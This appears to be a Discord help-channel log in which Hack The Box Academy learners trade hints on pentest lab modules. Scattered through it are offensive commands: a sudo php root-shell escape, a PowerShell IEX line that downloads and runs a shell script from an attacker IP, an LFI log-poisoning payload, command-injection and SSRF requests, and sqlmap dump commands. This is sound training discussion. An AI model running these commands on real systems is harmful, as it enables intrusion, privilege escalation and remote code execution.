#modules

Yep the Metasploit module, apologies if I missed that earlier.

👌🏻 thanks!

@distant stream it's working. I did it on my own windows.

But the proxifier on 172.16.5.19? Nothing listens on 1080 on 172.16.5.19. The Listener is op the first host. I think I didn't understand something. I run proxifier on the first host and created a rule to forward to 172.16.6.155. The sock test seems to work.

It's not listening on 172.16.5.19

it's on the host where you registered the dll.

Yes, I understand it also and my test with the rule works . So the Text on the Site is wrong 😉 "After starting our listener, we can transfer Proxifier portable to 172.16.5.19, and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port. See the clip below for a quick walkthrough of configuring Proxifier" Thanks for the Crosscheck 🙂 🙂 🙂

d

Trying to do this:
RDP to XXX with user "htb-student" and password "Academy_student_AD!"
for this: https://academy.hackthebox.com/module/143/section/1420

But it says wrong username and password. Any ideas?

thank you!

I'm no expert, I just know enough to modify a script xD. I can definitely feel where you are coming from

Hey, you mind dming about this? still having trouble

@edgy flame try using secretsdump.py and authenticate as the adunn user 🙂

Just curious: do people prefer using your own virtual machine or the Parrot for following modules?

depends on how long is the task

if it's short I'll just use pwnbox

Anyone know/done shells and payloads module? Stuck a question pertaining to the payloads section of the module

Got it thanks!

Thank you I finally fatigued it out with some help. Basically I had to pay attention to what Intruder's responses where explicitly saying, and then infer by what the responses were not explicitly saying. E.g when Intruder says "Only images are allowed" it doesn't necessarily say that the extension was bad.

Hi seeing if any ones done the Windows Privilege Escalation module may be able to give me some insight. Stuck on the section titled "Credential Hunting"

question "Search the file system for a file containing a password. Submit the password as your answer." Hint: :"Start at C:\Users"

Did indeed find a txt file at c:\Users\htb-student\Documents containing a password but when I enter it HTB is saying its incorrect. Am I missing something or is this an error in the module?

@lament crag try checking the root directory. ls /

format for the command is xfreerdp /v:<Target IP> /u:htb-student then it will prompt for password I recommended copy and pasting the password given.

Can someone help me with the broken authentication module on the section that I need to craft a reset token for htbadmin? I’m not that good at python so I can’t make the script to work and I’m stuck

dm

Hi

In Broken Authentication , I don't know why I can't find the encoding method

can anyone give a nudge

I could use some help with the final Skills Assessment for the File Upload Attacks module please.

I've uncovered the source code of the ||upload.php|| file and found the name of the uploads directory, but I'm not quite sure how exactly ||my files are being renamed when uploaded.||

And although I have a list of file extensions that might work because the response from the Burp Intruder's extension fuzzing is "Only images are allowed"...which implies the extension is actually fine, I still can't get a "successful upload" response from anything I try.

Can i DM?@feral gyro

yep

Can someone help me get started with Server-Side-Attacks skill assessment, I'm not sure which footprinting activities they mean here, if someone can at least DM me the method to use, I've tried everything taught on the module, but nothing even slightly matches the assessment website

Have anyone finished the Windows privilege Escalation skill assessment? I need to find the creds for "ldapadmin" but im stuck. Can anyone provide a hint? thx

hi everyone, can you help me please? i'm stuck answer meterpreter section, metasploit module, any suggestion for me?

Have you checked the webpage source code? Some external libraries might not be who they claim to be

question: "Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?"

are u finished "using the metasploit framework" module bro?

hi mate, are u have any suggestion for me please?

Did you already establish a shell?

nope, i not found any expoit to get shell

i was trying diffrent exploit but no session was created

target machine opened port 445 smb, 5000 upnp

i was tryiing eternalblue, eternalromance exploit but target is no vulnerable

Can you elaborate, there's only these two and they seem to be what they suggest to be: <li><a href="/auth/register">Register</a>
<li><a href="/auth/login">Log In</a>

Maybe some javascript library?

so any hint bro?

I think I found what you mean, but not sure how to use it

No haven't taken that module yet 😛

anyone doing the pivoting module?

Check DM

Hey guys doing the machine in Getting started module in the last section, can someone take a look at my notes and tell me what I can do to be better/ improve methodology?

It's my first time approaching a machine alone so would appreciate anything

the notes?

i was thinking it was more appropriate to do in dms

feel free to send in mine

need help with Server-side Attacks , DM me p,s

pls

Doing the same module, which part you're stuck in

Got it thanks! This was insanely tricky IMO

Can I DM someone regarding the Attacking Common Services Module (Attacking SMB section)???

Hi, I've just reached the end of Command Injection course (Skills Assessment), I can't figure out where to inject the payload.

I've tried caching requests with burp but no matter what function I use on the site, no useful requests are cached.

Then I tried injecting into the URL but similarly without any luck. I've tried all the Injection Operators in the cheat sheet.

Seems like I'm stack at level 0 here, please help!

hello, i am doing Local File Inclusion Skills assessment and i have managed to find the lfi and tried to poison on /proc/self/environ/ with the user agent <?=phpinfo(); ?> and when i checked my log file i can see that phpinfo() is working but system($_GET['cmd']) is not working can anyone correct me?

Haven't done this module, but have you tried the alternatives to system() function?

I finished it, is there a question?

Yes I do. Mind if I pm you?

Dm

How about system($_REQUEST['cmd'])

Is it on purpose that PIVOT-SRV01 is not domain joined computer, in module Pivoting Tunneling and Port forwarding skills Assessment?

Because, the adws is installed it is just disabled and actually I did not find any more hosts with ping sweep either.

@sweet heron Can I DM you regarding this one???

also the two interfaces on the PIVOT-SRV01 host has overlapping netmasks

Not working

Hi everyone, I am on the Web Enumeration section of the Getting Started Module and when trying to run gobuster on the target nothing happens. I also have tried pinging the target just to see if I can get any response but nothing? can someone please assist?

Am i doing something wrong?

You have to specify the port too

Gobuster assumes the default port for web services which is 80 but not default in our case

Make the URL like http://IP:port/

So in this scenario the port would be 32228? I tried your advice it with a new target and got the same results. Also, thank you for reading and assisting

Yes

same deal. Would you mind if I DM you?

Sure no problem

I'm in Linux fundamentals module and I downloaded the vpn key and ran it through sudo openvpn academy.ovpn. I then receive a initialisation Sequence complete but when I try to connect to ssh port nothing happens. No commands are working.After some time it shows Inactivity time out.

anyone able to give me a nudge on AD Enumeration & Attacks - Skills Assessment Part I?

I need help with "Submit the contents of the flag.txt file on the Administrator desktop on MS01"

I need assistance on command injection skills assessment. I haven't sent a malicious request but still get an error for one

I have a virus on my pc that duplicate files how do i get rid of it without losing my things

How do I configure and run nginx reverse proxy and ajp? I can't bind to port 80 because it's already in use.

Hi. I am stuck on Getting Start Module privilege escalation part of knowlege check. I used LinEnum.sh and found a vector to raise privilage using “sudo -l” command, but I could not go further. Is there any suggestion?

hola

run the command ls -la /usr/bin see them execute with root permission usually only python3 on linux go to https://gtfobins.github.io/ to load a pyload to get privilege

gtfo bins

if there's something from sudo -l, gtfo bins is a free win\

Thanks. I will do that.

Thanks. I will do that.

hey guys im in the last section of getting started module, i got the first flag but now i need to get privilege esc to root user. I found that i can use /bin/php without any password so I went on GTFObins to find a command that i can escalate sudo with. I found it but when i paste it into the meterpreter shell it does nothing. any idea? I upgraded the shell to tty

Hello!

I am currently stuck on the Skills Assessment of SQLMAP Essentials.

I have already found the issue with the user-agent. Unfortunately I can’t get any further.

Thanks for any help.

use this instead sudo php -r "system('/bin/sh');"

or first export CMD="/bin/sh" then sudo php -r "system('$CMD');"

holy shit bro thanks

but what was i doing wrong?

they both were different commands

the first one sets a environmental variable named CMD whose value is /bin/sh

tho you need to use export before that command to actually set it which gtfobins have specified

oh so instead of declaring the variable first you just put in the command straight away

yes

both methods are correct

wait but I thought i did it like that

.

i ran the CMD = "bin/sh" cmd first

oh I need to export before use?

its like export variable_name=value

where on gtfobins is that specified?

nowhere

I cannot find the answer of the questions "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)" in ACTIVE DIRECTORY ENUMERATION & ATTACKS. Could someone help me please on this?

it becomes common knowledge once you know about using env. variables and paths

okay so just as a rule of thumb from now on, I need to export the environmental variables before i try to declare them?

or you can directly use them

just like we did

like this right? sudo php -r "system('/bin/sh');"

.

yea okay

makes sense, thank you

YEP

Np

can someone give me a nudge on File Upload Attacks Blacklist Filters?

Hello!

I am currently stuck on the Skills Assessment of SQLMAP Essentials.

I have already found the issue with the user-agent. Unfortunately I can’t get any further.

Thanks for any help.

Dm

@silent knoll try adding an item to your cart and intercept with burp. There is some json in the body of the post request , and this is the injection point. From there you can fine tune your command until you get the flag.

Can anyone here please assist me with the Skills Assessment for the File Uploads Attack module? Feel free to DM. Thank you.

Anyone mind helping me understand the port forwarding going on in a particular HTB walkthrough?

hi i can help you. what's up

Hi people! I'm stuck again in the ZAP scanner section, anyone willing to give me a hand it seems the Scanner finds a Command injection vulnerability and I need to exploit it to read flag.txt
The thing is i don't really know how to exploit the vulnerability with the url it provides

@uncut raptor so in this screenshot , it is running the command: cat /etc/passwd . But it's all URL encoded. So try replacing it with a URL encoded cat /flag.txt

struggling with this just a minute now haha

this is mine which is not working: https://188.166.172.138:32461/ping.php?ip=127.0.0.1%26cat+%2Fflag.txt
although i'm crafting this blindly cause my instance got shut down and i haven't ran the active scan again

needs to be http and not https. Also your URL is slightly wrong

needs to be /devtools/ping.php

I need some help with the last question of the Information Gathering - Web - Skills Assessment of the Information Gathering - Web Edition module

I believe I have the right answer, but it doesn't seem to be working

i got it jared, thanks a lot you're a charm !

I found a subdomain with the keyword in it, but that doesn't seem to work for the answer

Anybody here having issues connecting to the "Web Service & API Attacks" - "Arbitrary File Upload" site? Port 3001?

Hi all, for the metasploit module - sessions&jobs (MSF sessions) could someone please DM or hint the relevant exploit for the root access? I tried ||sudo_baron_samedit|| but had trouble loading it. Thank you

thanks so much! --fresh-queries did the trick 🙂

@iron tartan if you're still having problems feel free to DM me 🙂

Thanks but I figured it out

The formatting of my scripts had been a bit off so there were a couple extra characters in the subdomain name that I needed to remove

@sweet heron Can I DM you??

In the Broken Authentication module, first assignment. Which tools am I supposed to use to bruteforce the login, there's no mention of this

"When we try to find default or weak credentials, we prefer using automated tools like ffuf, wfuzz, or custom Python scripts, but we could also do the same by hand or using a proxy such as Burp/ZAP. We encourage you to test all methods to become familiar with both automated tools and scripting."

There is also a custom python script that performs a bruteforce attack

I think in "PIVOTING, TUNNELING, AND PORT FORWARDING " - "Meterpreter Tunneling & Port Forwarding
" there is a problem with the second question: "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x.x)". The format is wrong and the seemingly valid answer is not accepted. Could the module authors take a look into this? Thanks.

@mild mango Can I DM you regarding the Attacking Common Services Module, Attacking SQL Section?

Anyone available who can help with AD Enumeration & Attacks - Skills assessment part 1?

I'm trying to get the credentials for the very first task in Broken Authentication, I'm running with: wfuzz -z file,/opt/useful/SecLists/Usernames/cirt-default-usernames.txt -z file,/opt/useful/SecLists/Passwords/cirt-default-passwords.txt 159.65.58.189:32686 -d "username=FUZZ&password=FUZ2Z" | All I keep getting is the same error, UserWarning:Fatal exception: Too many arguments.

What's the issue here

Also how am I supposed to know the login part of the website, when it gives me nothing when I try to login

Dm

Like, how can I figure this part out, if nothing comes up as I try to login:

dm me, might nudge you in the right direction

What's the dm?

sent you dm 👍

Answering myself: just try any possible output from every possible alternative.

Pivoting course was so awesome 😍

Dm me

hello, having trouble with sqlmap essentials module

[13:26:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

looking at the course again

i manage to get something

ok i got the answer

what does this mean?

Has anyone completed the Broken Authentication, first task? I'm getting nowhere here, cant find a simple username, or know what's the name of the 'login' page:

How can I wfuzz this if there is no login page

Hi Team!
I am working through Public Exploits on getting started. Am I doing something wrong here to start?

i would do a simple -sC -sV scan

0 host up

do you mind if I DM you? I am little lost

no problem

Fuzz for a login page first then

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

need help for sqlmap / --columns i dont understand

what's the Proceed Data about ?! helps are appreciated

https://academy.hackthebox.com/storage/modules/112/enum-method3.png

@ebon pine try navigating to the target:port in your browser 🙂

Hey guys need a hint on Skills Assessment - Using Web Proxies

@frigid vector which question?

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

DM me 🙂

@rustic sage can I Dm you on a question about MSF?

Can i get some help on ACTIVE DIRECTORY ENUMERATION & ATTACKS on question on ACL

 What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

I tried to reset the target multiple times, but every time the same issue with RDP:

[20:01:52:567] [495568:495569] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[20:01:52:567] [495568:495569] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[20:01:52:768] [495568:495569] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D]
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

on rdesktop the username and password is not working

This is really totally strange. Did someone have a solution for this issue?

Thank you!

hey i got a question

Using auxiliary/scanner/smb/smb_ms17_010 as check

An SMB Login Error occurred while connecting to the IPC$ tree.

Scanned 1 of 1 hosts (100% complete)

Cannot reliably check exploitability.

whats wrong with it?

So, what's the question?

i have to use metasploit to follow up with the Document and get the flag

but im having issues with metasploit

like that one

Can you screenshot me the question?

in dm?

Here

i cant send ss here

Then paste the question

when i run the "check" command on metasploit i get the "An SMB Login Error occurred while connecting to the IPC$ tree.
" error

when i run it i get Rex::Proto::SMB::Exceptions::LoginError: Login Failed: execution expired

1. An SMB Login Error occurred while connecting to the IPC$ tree. 2. Rex::Proto::SMB::Exceptions::LoginError: Login Failed: execution expired

these are the 2 errors im getting

Hey can someone give me some hint on Broken Authentication Skills Assessment?

use remmina work perfect for me

I can’t make sense of the cookie (if there’s any) and bruteforcing passwords of the enumerated users doesn’t seem to work

Does not work for me 😦

Hello did the pws.list worked for you?

😦 help

PASSWORD ATTACKS / Credential Hunting in Linux

Examine the target and find out the password of the user Will. Then, submit the password as the answer.
...

I dont understand the hint: "From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose."

There a ssh service? I Scanned the ip and dont give some important service related with the module as smb, ssh, rdp, etc

In AD Enumeration & Attacks - Skills Assessment Part I the questions of the users cleartext password. Could someone give me a hint where I can find the user password?

EDIT: Nevermind I see where I messed up now. Got the flag.

Looking for help on the "SSRF Exploitation Example" module. please.

I'm trying to use the bash script provided in the lesson, but I keep getting the error: bash: syntax error near unexpected token >'`

whenever I copy/paste the script into my terminal. Anyone know how I can fix this script to avoid the error?

System501@htb[/htb]$ function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }

Hi folks! i'm stuck at Skills Assessment - Using Web Proxies
where i have to fuzz the md5 cookie . In case anyone remembers this, it's a 31 char md5 hashed cookie where the excercise suggests hashing the last character and den encode with processing.
I'm running my attack with all this processing and getting all the same responses with 200 OK, i don't see a flag anywhere *edit @west canopy you remember this?

Hey fellow hackers, justa n00b with a quick question regarding linux. Im doing the cracking passwords with hashcat / Cracking wireless (WPA/WPA2) handshakes with hashcat module, My kali is running in a VM (UTM) aarch64 Mac M1 and I'm getting this error

@woeful oxide you need to be in the same directory as the cap2hccapx.bin file

got it! thanks

yes , you are trying to run a binary that is not located in your current working directory

@here Hey everyone i am stuck at intro to bash
for loop question and i am getting this error any help on this? it myabe that i am using a diff verion of openssl im the pwnbox how can i fix it?

this is my script

i didnt change anything on the original file just added these lines

srry, wrong ss, this is the one

& this one

@west canopy

Yes I am getting the same results as you 😦 Maybe try it on the pwnbox?

hello?

hi

Where is the file shell.ps1 suppose to be uploaded? I can't find it after a successful GET code. 200. Is it supposed to execute itself automatically.

shell.ps1 is hosted locally on your attack machine while running an http server. Druva.ps1 is uploaded to the target and ran from powershell

Yes and then $cmd of druva.ps1 uploads the shell.ps1 via IEX or is it suppose to automatially execute it? (this command: $cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')")
Because the file is well uploaded from my http server, but nothing happens after.

anyone could help me here i run ffuf but found nothing intereesting

hey i have a question guys does anyone have the issue where they openvpn but cant ping the module?

i was trying to make sure i was connected to the academy vpn

because when i was trying to run gobuster it was gettting errors

i will try again right now because i see sequence complete

get this which i know im connected to the vpn

but when i attempt to ping the module i get an error

packet loss

web enumeration

@devout vector typically Docker targets aren't pingable

@lament crag try checking the root directory. ls /

I know I definitely got the flag for "Find the flag by using a webshell." but it says its wrong. Is this this an error?

I get acces with the suggested username in the hint, but now i need get credentials from other user, all i have is an zip that im trying cracking and login.json firefox, but i can't crack the zip, and can't descrypt the login.json with firefox_decrypt.py, and i can't make remote conections to internet for download lazagne or other tool, any idea?

Solved!

Hi Again, Still looking for some help with AD Enumerations and attacks skills assessment. If anyone is available any help would be much appreciated

🙏

stuck on sqmlap module case 7

what am i doing wrong

sqlmap -u 'http://157.245.33.77:30000/case7.php?id=1' --threads=10 --risk=3 --level=5 --technique=U

what the hell i'm suposed to do with this hint

• "Try to count the number of columns in the page output, and specify them for sqlmap."

Hello guys

hello

specify the columns
sqlmap --columns X

i found this but like

id,name,etc... ?

Yes, just specify the number of columns like id, name, etc.

number?

i tried --columns=5 but it doent worked

You are on the right track

it dosent take a value like =5

i try with --columns id,name,birthday.... now we'll see

No, you must specify a value

dm if you still need help

trying this rn
sqlmap --columns 5 -u 'http://157.245.33.77:30196/case7.php?id=1' --level=5 --risk=3 --threads=10

try with --union-cols

I just add --union-cols? to the current command or i replace the --columns 5

replace

ok thanks

the command run for a life

i will let it run while i eat we'll see

sqlmap -u 'http://157.245.33.77:30196/case7.php?id=1' --level=5 --risk=3 --threads=10 --union-cols=5 --batch

Has anyone finished the Attacking Common Services module and can give me a hint on the last question on Attacking Common Services - Hard?

DM

it didnt worked

Yo guys
Is the target server a shared instance? I saw the exploits were already available there

And compiled too

you might try adding --dbs --dump and maybe --crawl=2

I know I definitely got the flag for "Find the flag by using a webshell." but it says its wrong. Is this this an error?

generally no.

what module is that

Alright

@lethal atlas SQL injection writing files

DM me

Is it academt stuff? You can DM if you want. (:

DM

sqlmap -u 'http://159.65.58.189:30795/case7.php?id=1' --level=5 --risk=3 --union-cols=5 --dbs --crawl=2 --threads=10 --batch --dump

got the flag with

sqlmap -u 'http://159.65.58.189:30795/case7.php?id=1' --level=5 --risk=3 --dbs --crawl=2 --threads=10 --batch --dump

getting rid of the --union-cols got me the flag wtf

hello everyone

anyone who has completed "Using Web Proxies" Module, to help me to understand what we have to do in the Question under "ZAP Fuzzer" section

cause I really not understanding what exactly have to do...!!!

Hi Team!
I have been working on the Public Exploits section of Getting Started and I am having a hard time understanding what I am doing incorrect

The hint is telling me to find a plugin vulnerability, the google maps one is the only one that seems to align with the hints from putting the IP:Port in the browser, it showed up on the search and msfconsole. I set the RHOST to the target and RPORT to the port given to me by HTB. I assume the TArgetURI is the path provided by MSFConsole. Any help would be great appreciated!

Targeturi is essentially the url of the website &/or web app hosted on the target. @ebon pine

Hi guys ! I have a question : in the archetype challenge of the starting point, we are using an extended procedure of Microsoft SQL Server called xp-cmdshell to be able to run a command line on the machine. But after that, we are trying to set up a 'reverse shell' with NC. I don't understand that. We already have access to the command line / power shell. Why are we trying to set up something else ?

Theres a few reasons you may want to upgrade to a reverse shell from xpcmdshell. One getting a reverse shell will allow for more interactive access on the underlying host. Youll be able to move to different directories, upload & execute files and even elevate privileges easier. Then if it was a multi-host network having a fully interactive shell would allow you to try to pivot to another host. Your pretty limited on what you can do through xpcmdshell compared to a fully interactive shell.

I see. I thought that from the moment we could execute system commands we could already do everything. But I guess having a dedicated reverse shell is more convenient

Absolutely. It also depends on what privileges you have when executing commands through xpcmdshell. In some cases you may use the access you have through the database to just further your access in a challenge lab network or on a real life engagement for an organization.

i'm working on the nibbles module following the academy guide and i'm stuck if anyone can help me out with a netcat issue

Nevermind got it. You have to add the script to the original thing not replace it
Ok the code is showing up but isn't triggering my netcat listener...

To be able to use a reverse shell, we use netcat and bind it to the a command line program with the -e option. Why can't I see this option in nc -h ?

the help menu offers basic flags and parameters which are used

you can consult the man page for all the flags

alright, thanks !

I'm working on the hacking wordpress module and getting stuck on the directory indexing. I'm not sure if it is me or something is wrong with the target system. Using the cheat sheet and everything provided in the lab up to this point, I can't get anything for the question referring to manually enumerating the target for any directories whose contents can be listed. The wpscan keeps failing, saying that the system seems to be down. I know this is taking way longer then it should. Can somebody please give me a hint?

haven't done the module but did you try running gobuster or something like that?

it will give you list of directories available on target

then you can manually check which directories content are listed when accessed

I want to download winPEASx64.exe as required but all of my browsers refuse telling me that it is a dangerous file.

Is there any way to bypass the browser protection ?

The module describes how you can list the content. Start in exactly this path and continue searching from there

Use the shell

thank you very much!

having some issues with active directory in academy, details in #613049811481919508, any and all help would be awesome

Still struggling on Broken Authentication Skills Assessment. I enumerated users, grepped the rock you according to the password policy and tried to brute force the usernames found with no success. AlsoI haven’t gotten anything out of the cookie. Any help?

Oh just found out how the cookie is formed

Hi

Heyyy hru ?

anyone can give me road map 2022 for cyber security ?

sry for bad english

What happened to the pillaging module??

Still struggling on Broken Authentication Skills Assessment. I enumerated users, grepped the rock you according to the password policy and tried to brute force passwords of the usernames found with no success. I found out how the cookie is formed and tried to use it in multiple ways to try bypass authentication but nothing worked. Any help?

Thank you, I had to take a break and look at fresh and see how simple it really was. My head was getting in the way again.

I finally became a ghost

I'm stuck on the Server Side Attacks Module: Nginx Reverse Proxy & AJP. Can someone give me a hand with this one?

When trying to setup the proxy/nginx on the Pwnbox, I keep getting the error nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65 I assume I'm setting up the nginx.conf file incorrectly.

Just need to get the Tomcat version of the Target. Answer format: X.X.XX

@ebon pine I don't think that exploit will work. Try navigating to the ip:port in your browser , this should reveal the WP Plugin being used.

@knotty falcon DM me 🙂

@sage jackal have you been able to get logged in as the support.xx user?

No and I’ve only found just the normal support user. Are there more ?

Yes, the support user's username is in the format of support.xx , where xx is a country code. Once you find a valid support.xx username, you can filter rockyou.txt for words meeting the complexity requirement and use that to log in.

I found it and logged in, trying to figure out what to do next

Hey Jared! Sorry for getting back to slate! I ended up getting it figured out and you are correct. Working on privilege escalation now. What a helpful community though!

@sage jackal try tampering the cookie to switch to an admin user 🙂

Hello, i stucked in this challange, i extracted the root hash and tried with rockyou list 2 times and cant get the password, some idea?

PASSWORD ATTACKS / Passwd, Shadow & Opasswd

Examine the target using the credentials from the user Will and find out the password of the root. Then, submit the password as the answer.

Figured it out, thanks! Done 🙂

do any of u have hacks for bullet force?

Im Stuck at "Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?"

a tried all super users i knew like root, admin...

can someon give me a hint which wordlist i should use

Did anyone have issues cracking the mscacheV2 hash for the AD enumeration and attack module skills assessment?

I ended up giving up and going to bed. I’ve got the reverse shell but went to bed trying to escalate privilege

Found a script but couldn’t get it to execute in the .php file I uploaded

Home, nap then figure it out 😂

I think I know what the problem was but was too tired to continue. Will do! Appreciate it.

Am I doing it wrong, but that's a valid query and LDAPwiki suggests the same :/

Full query -

Get-ADObject -LDAPFilter '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))' | select samaccountname,useraccountcontrol

Module Shells & Payloads, section windows infiltration.

Question : Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\

Could someone help me on this one?

Thx in advance for your tyime

hi fellows, quick question, do we have mobile hacking modules?

or any place you can advice I start studying from?

Module File Transfers, section Windows File Transfer Methods .

Question : Another way to Uploud the uploud_win.zip file

Hi guys, I'm curious to find another way to uploud this file , I did success only
with copy and paste in my Windows machine, I tried with curl, Web-Request,
Bitsadmin but I didn't succeeded (give me always the 403 response - only-read server).

There is another way to uploud this file?

Thanks 🙂

Anyone did hard skill assessment on Password Attacks? I'm losing my mind

@thin barn did you solve "Passwd, Shadow & Opasswd" yet? I am stuck in getting the password of the root user after made unshadow from the passwd and shadow files with the user Will, i tried 2 times with rockyou wordlist and could not found the password, is on rockyou list?

Hello, has anyone done the Web Requests module specifically the Get section. I've been banging my head against the desk all afternoon trying to solve this....

@spring bloom hi, I already done , what's the problem?

send me a pv 🙂

Hi, Dm if need help

Dm

Can someone provide me with a nudge? I am doing the Cookie Bruteforce section, question 1 of the Broken authentication module. Not sure which wordlist I can use to bruteforce the position of the user role to that of a super user...

Not the best place to post this.... Go to another discord for this.

MEtasploit module: Session and jobs section

"The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer."

I was able to get a shell, but I did not have root. I can't find the relevant exploit to run on the target system. (I have been using exploits for the elfinder service)

Help would be appreciated.

Im stuck in the OSINT module What is the hosting provider for the inlanefreight.com domain? i used whois and shodan both gives me DigitalOcean but it dosent work anyone can help plz?

if anyone is available to help with the web attacks module i would appreciate it. stuck trying to understand this javascript

window.location = /download.php?contract=${encodeURIComponent(btoa(uid))};

specifically the encoding part

the module example they talk about uses md5 instead of the encodeURIComponent

but the contract filename is definately md5 encoded from what i can see

nevermind, was reading the wrong part of the code i guess

I downloaded linpeas with the shell (user privileges) to find the vulnerability of sudo.

did they ever answer?

The question is not clearly stated. You need the role super.

Look in the developer tools for the URL. Then send a request via cURL to the found URL with the search term flag.

Also have a look at the hint. You have to authenticate yourself.

Hey, its all good I got it in the end with some help from someone. Thank you though 🙂

Hello, I am doing the course Bug Bounties, I am in the module Using Web Proxies- and solve all the questions for skills assessment.
But only one questions I try to solve but I did not success if anyone can help me to give me the solution.
The question is Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)?????

Guys, I'm having problems with Skill Assessment - Broken Authentication. I found out about Username ||support||, but I don't know what to do next. I tried with Rockyou.txt wordlist filtered on ||first capital Letter, at Least One LowerCase, Final Digit, and at Least 20 Characters||, but none managed to make match with Username ||support||, even working with the timeout problem, and inserting manually. I also tried to see about this ||country code|| that people are talking about on the ||Support|| tab, but I couldn't take any information about it. Could anyone give me any hint about this part?

@random cape so for the support user, it's actually in the format of support.xx , where xx is a country code. Once we find a valid username for the support user (there are more than one), we can filter the rockyou.txt wordlist for words matching the password complexity requirement.

@halcyon owl DM me 🙂

@foggy furnace DM me if you still need help on Shells & Payloads !

whats up @west canopy

@lethal atlas whats up brother !

Working my life away lol

They make you work Sundays?

My wife does.

@raven cairn Have you tried using the local exploit suggester?

@lethal atlas does she pay well?

@limpid wharf DM me if you still need help with OSINT 🙂

@west canopy she lets me sleep with her so I guess thats good enough.

lmao

@grand brook I was able to transfer the file over with Powershell

Hey!, im stuck on the Server-Side Attacks, Nginx Reverse Proxy & AJP.

Each time i try to set up the enviroment i got this message:
nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65
I assume I'm setting up the nginx.conf file incorrectly

@spice olive DM me 🙂

Got this resolved

Hello. I'm having issues again. Metasploit framework module: meterpreter section.

I have been trying a multitude of metasploit modules, but not have worked.

An nmap scan shows that Fortilogger can be accessed on the browser. Am I supposed to attack this?

@raven cairn yes, try the fortilogger arbitrary file upload exploit

I have been doing that... I wonder what I am doing wrong ...

Lol. I got the shell. Confused what I did wrong.

Probably just screwed up some options

windows privilege escalation skill assessment part 1. At the beginning having trouble exploiting the command injection vulnerability to get reverse shell. Windows CMD netcat one liners dont seem to be working for me. Any tips or clues?

Doing vulnerability assessment, nessus skill assessment. Anyone know where the data is from the scan that was already ran?

@wheat garden i was able to do it by starting an impacket-smbserver which hosted a netcat executable , then used that to get a reverse shell

@livid pier it should be My Scans --> Windows_basic_authed

My savior!

OKay thank you for the pointer I will try that.

You find it in the linux box or the windows box?

Not sure what you mean

I sshd in here, but it is telling me to attack a windows box

Im looking for this

i think if you just go to port 8834 it will bring up the Nessus Dashboard

Is there a current issue with the website where the Unlock button isn't working on modules?

nothing coming through on the web console or network when i click it

Also tried in private window with no addons and same affect. All that changes is the padding on the webpage when i click it

@tiny ember maybe try a different browser if you haven't already?

yeah i tried firefox as well, in private window. (currently using Brave)

interestingly, when i hit the Continue button here, i get this error at the top for "This module is coming soon" and i'm wondering if the "The Penetration Testing Process" module at the top is overriding all the other unlocks or something

tried on other pages as well and still no dice :(. Is there a different forum to go through for this. Or am I assuming that no one else is experiencing this?

gunna try a whole nother computer 🙂

okay weird, doesn't work on my Mac either

@west canopy took me years but i found it, thank you

Could I get some help with the Hacking Wordpress: Directory Indexing module please?
I assume the flag is buried somewhere in the ||wp-includes|| directory (?) and I've tried various curl and grep commands but no luck. Or is there a way we issue the tree command somehow to the remote web page?

https://academy.hackthebox.com/achievement/519906/15

Anyone on who can help with AD attacked skills assessment part II. I'm stuck on the "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."

@knotty falcon try looking in /wp-content/plugins/mail-masta

@manic ermine try using DomainPasswordSpray.ps1 and reproducing the steps shown in the "password spraying from windows" section

The content of the flag.txt is getting incorrect how?

Module: shells and payloads
Section: Infiltrating windows

Successfully exploited the target system,

Goddamn
There was the $ at the end and it appeared to be part of shell prompt

Evil

Thanks Jared...has anyone had issues with importing "domainpasswordspray.ps1"? I'm getting:
At C:\Users\AB920\Desktop\DomainPasswordSpray.ps1:261 char:21

